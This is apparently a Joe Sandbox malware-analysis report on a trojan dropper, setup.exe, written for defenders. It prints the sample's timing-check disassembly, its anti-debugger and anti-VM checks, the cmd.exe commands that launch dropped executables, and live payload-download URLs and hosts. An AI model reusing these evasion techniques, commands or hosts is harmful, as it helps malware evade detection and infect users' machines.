Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50801D8 second address: 508027E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F47CD361214h 0x00000013 add al, 00000028h 0x00000016 jmp 00007F47CD36120Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F47CD361218h 0x00000022 and si, 9488h 0x00000027 jmp 00007F47CD36120Bh 0x0000002c popfd 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F47CD361219h 0x00000034 xchg eax, ebp 0x00000035 jmp 00007F47CD36120Eh 0x0000003a mov ebp, esp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F47CD361217h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508027E second address: 5080283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508070D second address: 5080739 instructions: 0x00000000 rdtsc 0x00000002 call 00007F47CD36120Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F47CD361211h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080739 second address: 508073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50809F1 second address: 5080A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 44B4h 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080A01 second address: 5080A07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050035 second address: 5050063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361210h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD361217h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050063 second address: 505007B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD346624h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505007B second address: 505007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505007F second address: 50500F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F47CD34661Ch 0x0000000f pushfd 0x00000010 jmp 00007F47CD346622h 0x00000015 or ecx, 65017498h 0x0000001b jmp 00007F47CD34661Bh 0x00000020 popfd 0x00000021 pop esi 0x00000022 push ebx 0x00000023 pushfd 0x00000024 jmp 00007F47CD346624h 0x00000029 and cx, 1EF8h 0x0000002e jmp 00007F47CD34661Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F47CD346622h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50500F9 second address: 50500FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50500FF second address: 5050123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F47CD34661Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080308 second address: 5080325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080325 second address: 5080335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD34661Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060E89 second address: 5060F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F47CD361213h 0x0000000c add si, 99DEh 0x00000011 jmp 00007F47CD361219h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 mov di, 72ECh 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F47CD361217h 0x00000030 jmp 00007F47CD361213h 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060F03 second address: 5060F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F47CD346627h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060F27 second address: 5060F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c jmp 00007F47CD36120Eh 0x00000011 and dword ptr [eax+04h], 00000000h 0x00000015 jmp 00007F47CD361210h 0x0000001a pop ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov esi, 394F73B3h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060F72 second address: 5060F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50807D1 second address: 508083B instructions: 0x00000000 rdtsc 0x00000002 mov esi, 1A6A4881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov ebx, eax 0x0000000c mov esi, 2776A25Fh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov si, di 0x00000018 pushfd 0x00000019 jmp 00007F47CD361217h 0x0000001e adc esi, 291AC05Eh 0x00000024 jmp 00007F47CD361219h 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F47CD361213h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\setup.exe | Special instruction interceptor: First address: 2E8CAB, instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe | Special instruction interceptor: First address: 496773, instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe | Special instruction interceptor: First address: 49F418, instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000, name: DriverDesc
Source: C:\Users\user\Desktop\setup.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, name: SystemBiosVersion
Source: C:\Users\user\Desktop\setup.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, name: VideoBiosVersion
Source: C:\Users\user\Desktop\setup.exe, TID: 5908 | Thread sleep time: -38019s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: setup.exe, 00000000.00000002.2477120409.0000000000479000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2477887067.00000000011B0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWhV
Source: setup.exe, 00000000.00000002.2477120409.0000000000479000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: setup.exe, 00000000.00000002.2477887067.0000000001169000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW5`v
Source: C:\Users\user\Desktop\setup.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\setup.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\setup.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\setup.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\setup.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\setup.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\setup.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\setup.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\setup.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\setup.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\setup.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\setup.exe | File opened: NTICE
Source: C:\Users\user\Desktop\setup.exe | File opened: SICE
Source: C:\Users\user\Desktop\setup.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\setup.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\setup.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\setup.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe"
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe"
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe"
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe"
Source: setup.exe, 00000000.00000002.2477120409.0000000000479000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: YProgram Manager
Source: setup.exe | Binary or memory string: YProgram Manager
Source: C:\Users\user\Desktop\setup.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
MITRE ATT&CK Matrix (techniques flagged for this sample, with the number of matching signatures in parentheses)

Execution: Command and Scripting Interpreter (2)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (12); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (24); Process Injection (12); Obfuscated Files or Information (1); Software Packing (11); DLL Side-Loading (1)
Discovery: Query Registry (1); Security Software Discovery (631); Virtualization/Sandbox Evasion (24); Process Discovery (2); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (212)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13)

No techniques were flagged under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Collection, Exfiltration or Impact.
Behavior Graph

Behavior Graph ID: 1472936
Sample: setup.exe
Start date: 14/07/2024
Architecture: WINDOWS
Score: 81

Start node
  Domains/IPs: suomenen.com; nffiiload08.top; 2 other IPs or domains
  Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures

setup.exe 16 (started)
  Network: ip-api.com 208.95.112.1, 49719, 80, TUT-ASUS, United States; 45.12.4.151, 49720, 80, MNOGOBYTE-ASMoscowRussiaRU, Russian Federation; 2no.co 104.21.79.229, 443, 49713, CLOUDFLARENETUS, United States
  Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (window names); Tries to evade debugger and weak emulator (self modifying code); 4 other signatures
  Child processes: cmd.exe 1 2 (started); cmd.exe 2 (started); cmd.exe 2 (started); cmd.exe 2 (started)
    Each cmd.exe starts one conhost.exe

Source | Detection | Scanner | Label | Link
setup.exe | 71% | ReversingLabs | Win32.Trojan.Generic |
setup.exe | 100% | Avira | HEUR/AGEN.1313462 |
setup.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
Source | Detection | Scanner | Label | Link
http://ip-api.com/json | 0% | URL Reputation | safe |
http://45.12.4.151/googlemap.exel | 0% | Avira URL Cloud | safe |
https://2no.co/2URUU5m | 100% | Avira URL Cloud | malware |
http://nffiiload08.top/download.php?file=4.exed: | 0% | Avira URL Cloud | safe |
http://ip-api.com/jsonh | 0% | Avira URL Cloud | safe |
http://nffiiload08.top/download.php?file=6.exes; | 0% | Avira URL Cloud | safe |
http://suomenen.com/helka/trll.php | 0% | Avira URL Cloud | safe |
http://45.12.4.151/googlemap.exe | 0% | Avira URL Cloud | safe |
http://nffiiload08.top/download.php?file=4.exe | 0% | Avira URL Cloud | safe |
http://nffiiload08.top/download.php?file=4.exeG; | 0% | Avira URL Cloud | safe |
http://ip-api.com/jsoncountryCodeinvalid | 0% | Avira URL Cloud | safe |
https://2no.co/D | 100% | Avira URL Cloud | malware |
https://2no.co/ | 100% | Avira URL Cloud | malware |
https://2no.co/2URUU5 | 100% | Avira URL Cloud | malware |
http://ip-api.com/jsonB | 0% | Avira URL Cloud | safe |
https://2no.co/2URUU5http://nffiiload08.top/download.php?file=6.exehttp://nffiiload08.top/download.p | 100% | Avira URL Cloud | malware |
http://nffiiload08.top/download.php?file=6.exe | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
2no.co | 104.21.79.229 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | false | | unknown
nffiiload08.top | unknown | unknown | false | | unknown
suomenen.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://45.12.4.151/googlemap.exe | false | Avira URL Cloud: safe | unknown
http://ip-api.com/json | false | URL Reputation: safe | unknown
https://2no.co/2URUU5 | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://2no.co/2URUU5m | setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://45.12.4.151/googlemap.exel | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nffiiload08.top/download.php?file=6.exes; | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com/jsoncountryCodeinvalid | setup.exe, 00000000.00000002.2476665891.0000000000251000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com/jsonh | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nffiiload08.top/download.php?file=4.exe | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nffiiload08.top/download.php?file=4.exeG; | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://suomenen.com/helka/trll.php | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp; setup.exe, 00000000.00000003.2289141220.00000000011F9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nffiiload08.top/download.php?file=4.exed: | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://2no.co/2URUU5http://nffiiload08.top/download.php?file=6.exehttp://nffiiload08.top/download.p | setup.exe, 00000000.00000002.2476665891.0000000000251000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
https://2no.co/D | setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://2no.co/ | setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://nffiiload08.top/download.php?file=6.exe | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com/jsonB | setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.79.229 | 2no.co | United States | 13335 | CLOUDFLARENETUS | false
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
45.12.4.151 | unknown | Russian Federation | 42632 | MNOGOBYTE-ASMoscowRussiaRU | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1472936
Start date and time: 2024-07-14 18:46:57 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: setup.exe
Detection: MAL
Classification: mal81.evad.winEXE@13/2@4/3
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target setup.exe, PID 4328 because there are no executed functions
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: setup.exe
Time | Type | Description
12:48:15 | API Interceptor | 31x Sleep call for process: setup.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.79.229 | Og1SeeXcB2.exe | Get hash | malicious | Remcos, Blank Grabber, PrivateLoader, SmokeLoader | Browse |
| file.exe | Get hash | malicious | SmokeLoader | Browse |
| setup.hta | Get hash | malicious | RHADAMANTHYS | Browse |
| setup.lnk | Get hash | malicious | RHADAMANTHYS | Browse |
| Blog.zip | Get hash | malicious | RHADAMANTHYS | Browse |
| file.exe | Get hash | malicious | RedLine, SmokeLoader | Browse |
| file.exe | Get hash | malicious | RedLine, SmokeLoader | Browse |
| file.exe | Get hash | malicious | RedLine, SmokeLoader | Browse |
| file.exe | Get hash | malicious | RedLine, SmokeLoader | Browse |
208.95.112.1 | Solara.exe | Get hash | malicious | DCRat | Browse | ip-api.com/line/?fields=hosting
| ARRIVAL NOTICE.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
| XClient.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
| rQuotation.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
| https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObject | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | ip-api.com/line/?fields=hosting
| QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
| QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
| NEW ORDER.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
| SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe | Get hash | malicious | Akira Stealer | Browse | ip-api.com/json/Unknown%20IP
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ip-api.com | Solara.exe | Get hash | malicious | DCRat | Browse | 208.95.112.1
| https://parthsharma13.github.io/netflixcloneusingtailwind | Get hash | malicious | Unknown | Browse | 51.77.64.70
| http://yhrryu.w3spaces.com/index.html | Get hash | malicious | Unknown | Browse | 51.77.64.70
| ARRIVAL NOTICE.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
| XClient.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
| Rechnung.zip | Get hash | malicious | HTMLPhisher | Browse | 208.95.112.1
| rQuotation.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
| https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObject | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 208.95.112.1
| QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
2no.co | file.exe | Get hash | malicious | XenoRAT | Browse | 172.67.149.76
| Og1SeeXcB2.exe | Get hash | malicious | Remcos, Blank Grabber, PrivateLoader, SmokeLoader | Browse | 104.21.79.229
| file.exe | Get hash | malicious | SmokeLoader | Browse | 104.21.79.229
| rpeticao_inicial.vbs | Get hash | malicious | Unknown | Browse | 172.67.149.76
| setup.hta | Get hash | malicious | RHADAMANTHYS | Browse | 104.21.79.229
| setup.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 104.21.79.229
| Blog.zip | Get hash | malicious | RHADAMANTHYS | Browse | 104.21.79.229
| qG2cUr0x4A.exe | Get hash | malicious | BitCoin Miner, RedLine, SmokeLoader | Browse | 172.67.149.76
| file.exe | Get hash | malicious | RedLine, SmokeLoader | Browse | 104.21.79.229
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | #U8acb#U6c42#U66f8.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 188.114.96.3
| https://jc541gdi.r.ap-south-1.awstrack.me/L0/https:%2F%2Fapi.growthschool.io%2Fredirect%3Fredirect=https%253A%252F%252Foutskill-api.growthschool.io%252Fv1%252Fredirect%253Fredirect%253Dhttps%25253A%25252F%25252Fwebinar.growthschool.io%25252Flive%25252F269690%25253Fsignup%25253Dd4694f1d-e1f6-4ebc-81f9-ccf7f397c75f%2526propsGeneratorKey%253DwebinarCommsLinkClicked%2526job%253DtrackEvent%2526eventName%253DWebinar%252520Comms%252520Link%252520Clicked%2526trackingProps%25255Btemplate_id%25255D%253DoneHourBefore%2526trackingProps%25255Bcomms_channel%25255D%253Demail%2526trackingProps%25255Bcta_text%25255D%253DJoin%252520Stream%2526trackingProps%25255Bcta_type%25255D%253Dlive_session%2526trackingProps%25255Blink_clicked%25255D%253Dhttps%25253A%25252F%25252Fwebinar.growthschool.io%25252Flive%25252F269690%25253Fsignup%25253Dd4694f1d-e1f6-4ebc-81f9-ccf7f397c75f%2526webinarSignupId%253D2330725/1/01090190b18b243d-902569cd-4b19-4fb0-9d62-751dd82840dc-000000/eiZ4tO0LwZqkUm_KmdP3dz-yVLc=163 | Get hash | malicious | Unknown | Browse | 104.22.65.157
| s6ue6dcFAI.exe | Get hash | malicious | Babadeda | Browse | 172.64.41.3
| JblYqEneyY.exe | Get hash | malicious | Babadeda | Browse | 172.64.41.3
| DHL Waybill & Shipping Document.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
| s6ue6dcFAI.exe | Get hash | malicious | Babadeda | Browse | 172.64.41.3
| Shipping Docs PO#QSB-8927393_2324, QSB-8927394_23-24.xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
| utb4rWi35E.exe | Get hash | malicious | LummaC | Browse | 172.67.143.57
| Orden de Compra.exe | Get hash | malicious | GuLoader | Browse | 104.26.12.205
MNOGOBYTE-ASMoscowRussiaRU | tdQ8dOfnDZ.elf | Get hash | malicious | Mirai, Moobot | Browse | 77.220.188.98
| BwuomGG1ev.elf | Get hash | malicious | Mirai | Browse | 83.222.115.140
| lMIVD0KqYQ.elf | Get hash | malicious | Mirai | Browse | 83.222.115.132
| bR9Ri9cFkm.elf | Get hash | malicious | Unknown | Browse | 83.222.115.104
| https://goo.su/l1bfUYR | Get hash | malicious | Unknown | Browse | 83.222.115.14
| dI3tFWyJ6d.elf | Get hash | malicious | Mirai | Browse | 77.220.188.52
| 7n89nEPSkV.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 77.220.164.70
| huhu.arm5.elf | Get hash | malicious | Mirai, Okiru | Browse | 77.220.188.78
| RpjE7NostK.elf | Get hash | malicious | Mirai | Browse | 77.220.164.90
TUT-ASUS | Solara.exe | Get hash | malicious | DCRat | Browse | 208.95.112.1
| ARRIVAL NOTICE.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
| XClient.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
| Rechnung.zip | Get hash | malicious | HTMLPhisher | Browse | 208.95.112.1
| rQuotation.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
